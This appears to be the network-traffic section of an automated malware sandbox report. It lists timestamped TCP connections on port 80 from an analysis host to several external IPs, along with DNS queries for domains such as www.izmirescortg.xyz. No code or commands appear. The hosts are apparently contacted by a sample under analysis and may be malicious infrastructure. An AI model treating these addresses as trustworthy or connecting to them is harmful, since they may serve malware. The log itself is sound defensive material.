Jan 10, 2025 22:49:42.196337938 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.196367979 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.196409941 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.196424961 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.196474075 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.281969070 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295677900 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295701981 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295708895 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295757055 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.295794010 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.295845985 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295881033 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295888901 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295928955 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.295968056 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.295974970 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296004057 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.296506882 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296561956 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296575069 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296606064 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.296641111 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296648026 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.296696901 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.297188044 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297215939 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297224045 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297265053 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.297308922 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297368050 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297379971 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.297406912 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.300556898 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.300575018 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.300587893 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.300626993 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.300724030 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.300729990 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.300777912 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.386280060 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.386296034 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.386482000 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.399985075 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400028944 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400037050 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400103092 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400111914 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400120020 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400134087 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400170088 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400196075 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400204897 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400218010 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400224924 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400264025 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400377035 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400401115 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400414944 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400463104 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400485039 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400496960 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400552988 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.400629997 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.400684118 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.833338976 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:43.988362074 CET	65507	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:43.993311882 CET	80	65507	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:43.993539095 CET	65507	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:44.007637024 CET	65507	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:44.012506008 CET	80	65507	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:44.803730011 CET	80	65507	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:44.804378033 CET	80	65507	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:44.804460049 CET	65507	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:44.806631088 CET	65507	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:44.811482906 CET	80	65507	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:50.129417896 CET	65508	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:50.134708881 CET	80	65508	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:50.134794950 CET	65508	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:50.148863077 CET	65508	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:50.153709888 CET	80	65508	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:50.802432060 CET	80	65508	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:50.802536964 CET	80	65508	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:50.802588940 CET	65508	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:51.661569118 CET	65508	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:52.680661917 CET	65509	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:52.685554028 CET	80	65509	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:52.685729980 CET	65509	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:52.702723980 CET	65509	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:52.707607985 CET	80	65509	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:53.366782904 CET	80	65509	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:53.366818905 CET	80	65509	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:53.366906881 CET	65509	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:54.208357096 CET	65509	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:55.228012085 CET	65510	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:55.232932091 CET	80	65510	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:55.233025074 CET	65510	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:55.248200893 CET	65510	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:55.253066063 CET	80	65510	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:55.253154039 CET	80	65510	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:55.848948956 CET	80	65510	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:55.849033117 CET	80	65510	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:55.849136114 CET	65510	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:56.755456924 CET	65510	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:57.774219036 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:57.782915115 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:57.783041000 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:57.792543888 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:57.797266960 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:58.393254995 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:58.393275976 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:58.393290043 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:49:58.393421888 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:58.393460989 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:58.396193981 CET	65511	80	192.168.2.8	103.224.182.242
Jan 10, 2025 22:49:58.400945902 CET	80	65511	103.224.182.242	192.168.2.8
Jan 10, 2025 22:50:03.514110088 CET	65514	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:03.519035101 CET	80	65514	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:03.519109011 CET	65514	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:03.546703100 CET	65514	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:03.551748991 CET	80	65514	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:04.137619972 CET	80	65514	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:04.137641907 CET	80	65514	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:04.137692928 CET	65514	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:05.052381039 CET	65514	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:06.070771933 CET	65515	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:06.075834990 CET	80	65515	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:06.075946093 CET	65515	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:06.089970112 CET	65515	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:06.094847918 CET	80	65515	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:06.711913109 CET	80	65515	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:06.711941957 CET	80	65515	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:06.712109089 CET	65515	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:07.598984957 CET	65515	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:08.643630981 CET	65516	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:08.648566961 CET	80	65516	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:08.648646116 CET	65516	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:08.665330887 CET	65516	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:08.670273066 CET	80	65516	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:08.670418024 CET	80	65516	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:09.271588087 CET	80	65516	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:09.271667004 CET	80	65516	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:09.271732092 CET	65516	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:10.177088022 CET	65516	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.245795965 CET	65517	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.250741959 CET	80	65517	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:11.250833988 CET	65517	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.272500038 CET	65517	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.277524948 CET	80	65517	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:11.879751921 CET	80	65517	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:11.880023003 CET	80	65517	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:11.880168915 CET	65517	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.882764101 CET	65517	80	192.168.2.8	185.27.134.206
Jan 10, 2025 22:50:11.887505054 CET	80	65517	185.27.134.206	192.168.2.8
Jan 10, 2025 22:50:18.274374962 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:18.279228926 CET	80	65518	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:18.282238960 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:18.297832966 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:18.302846909 CET	80	65518	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:19.216187000 CET	80	65518	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:19.216206074 CET	80	65518	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:19.216341019 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:19.216589928 CET	80	65518	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:19.216641903 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:19.802162886 CET	65518	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:20.826539040 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:20.831485987 CET	80	65519	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:20.831572056 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:20.845798016 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:20.850621939 CET	80	65519	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:21.775463104 CET	80	65519	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:21.775485039 CET	80	65519	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:21.775594950 CET	80	65519	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:21.775677919 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:21.775717974 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:22.348953009 CET	65519	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:23.513734102 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:23.520088911 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:23.520172119 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:23.624171972 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:23.629169941 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:23.629264116 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:24.511892080 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:24.511940002 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:24.512052059 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:24.513242960 CET	80	65520	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:24.513298035 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:25.130400896 CET	65520	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:26.352586985 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:26.357549906 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:26.357642889 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:26.419190884 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:26.424099922 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:27.296711922 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:27.296727896 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:27.296785116 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:27.296883106 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:27.296953917 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:27.300168037 CET	65521	80	192.168.2.8	165.154.96.210
Jan 10, 2025 22:50:27.304944992 CET	80	65521	165.154.96.210	192.168.2.8
Jan 10, 2025 22:50:32.323353052 CET	65522	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:32.328176975 CET	80	65522	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:32.328614950 CET	65522	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:32.342902899 CET	65522	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:32.347712040 CET	80	65522	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:33.040553093 CET	80	65522	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:33.040693998 CET	80	65522	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:33.040772915 CET	65522	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:33.848958969 CET	65522	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:34.868294954 CET	65523	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:34.873219013 CET	80	65523	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:34.873332024 CET	65523	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:34.888376951 CET	65523	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:34.893166065 CET	80	65523	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:35.564785957 CET	80	65523	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:35.564868927 CET	80	65523	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:35.564929008 CET	65523	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:36.395893097 CET	65523	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:37.414650917 CET	65524	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:37.419460058 CET	80	65524	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:37.419527054 CET	65524	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:37.437347889 CET	65524	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:37.442192078 CET	80	65524	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:37.442276001 CET	80	65524	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:38.110814095 CET	80	65524	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:38.110951900 CET	80	65524	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:38.111057043 CET	65524	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:38.942703009 CET	65524	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:39.961513042 CET	65525	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:39.966345072 CET	80	65525	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:39.966442108 CET	65525	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:39.975893021 CET	65525	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:40.180156946 CET	80	65525	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:40.676239967 CET	80	65525	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:40.676413059 CET	80	65525	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:40.676682949 CET	65525	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:40.679595947 CET	65525	80	192.168.2.8	45.141.156.114
Jan 10, 2025 22:50:40.684367895 CET	80	65525	45.141.156.114	192.168.2.8
Jan 10, 2025 22:50:46.275109053 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:46.280097961 CET	80	65526	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:46.280188084 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:46.295875072 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:46.301007986 CET	80	65526	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:47.106045961 CET	80	65526	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:47.161386013 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:47.196737051 CET	80	65526	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:47.196794987 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:47.802083969 CET	65526	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:48.821429968 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:48.826232910 CET	80	65527	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:48.826877117 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:48.846307039 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:48.851563931 CET	80	65527	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:49.671652079 CET	80	65527	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:49.723937035 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:49.758753061 CET	80	65527	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:49.758819103 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:50.349033117 CET	65527	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:51.377111912 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:51.381917000 CET	80	65528	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:51.382000923 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:51.398108006 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:51.403018951 CET	80	65528	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:51.403045893 CET	80	65528	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:52.194669962 CET	80	65528	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:52.240000010 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:52.281893969 CET	80	65528	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:52.282040119 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:52.911647081 CET	65528	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:53.930650949 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:53.935590982 CET	80	65529	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:53.935695887 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:53.944916964 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:53.949697971 CET	80	65529	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:54.775644064 CET	80	65529	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:54.817715883 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:54.866496086 CET	80	65529	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:54.866719007 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:54.867681980 CET	65529	80	192.168.2.8	202.79.161.151
Jan 10, 2025 22:50:54.872423887 CET	80	65529	202.79.161.151	192.168.2.8
Jan 10, 2025 22:50:59.947376013 CET	65530	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:50:59.952368021 CET	80	65530	188.114.96.3	192.168.2.8
Jan 10, 2025 22:50:59.952439070 CET	65530	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:00.185157061 CET	65530	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:00.190978050 CET	80	65530	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:01.692946911 CET	65530	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:01.698059082 CET	80	65530	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:01.698188066 CET	65530	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:02.776076078 CET	65531	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:02.781299114 CET	80	65531	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:02.781404972 CET	65531	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:02.869610071 CET	65531	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:02.874509096 CET	80	65531	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:04.380281925 CET	65531	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:04.385297060 CET	80	65531	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:04.385395050 CET	65531	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:05.399753094 CET	65532	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:05.404680014 CET	80	65532	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:05.404768944 CET	65532	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:05.420269966 CET	65532	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:05.425183058 CET	80	65532	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:05.425235033 CET	80	65532	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:06.927185059 CET	65532	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:06.932315111 CET	80	65532	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:06.932559013 CET	65532	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:07.946186066 CET	65533	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:07.951051950 CET	80	65533	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:07.951122999 CET	65533	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:07.961061001 CET	65533	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:07.965851068 CET	80	65533	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:47.189107895 CET	80	65533	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:47.189929962 CET	80	65533	188.114.96.3	192.168.2.8
Jan 10, 2025 22:51:47.190046072 CET	65533	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:47.192264080 CET	65533	80	192.168.2.8	188.114.96.3
Jan 10, 2025 22:51:47.197017908 CET	80	65533	188.114.96.3	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:49:00.668456078 CET	53	59828	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:02.184293032 CET	53	59170	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:20.345032930 CET	53350	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:20.368978977 CET	53	53350	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:36.134152889 CET	56413	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:36.173162937 CET	53	56413	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:49.820991993 CET	52611	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:50.126955986 CET	53	52611	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:03.439291954 CET	53200	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:03.485141993 CET	53	53200	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:16.899125099 CET	50954	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:17.895956039 CET	50954	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:18.271655083 CET	53	50954	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:18.271675110 CET	53	50954	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:32.306009054 CET	59030	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:32.321130037 CET	53	59030	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:45.697027922 CET	64477	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:46.272382021 CET	53	64477	1.1.1.1	192.168.2.8
Jan 10, 2025 22:50:59.931351900 CET	61977	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:50:59.944077015 CET	53	61977	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:49:20.345032930 CET	192.168.2.8	1.1.1.1	0x7786	Standard query (0)	www.izmirescortg.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:49:36.134152889 CET	192.168.2.8	1.1.1.1	0x3b22	Standard query (0)	www.aballanet.cat	A (IP address)	IN (0x0001)	false
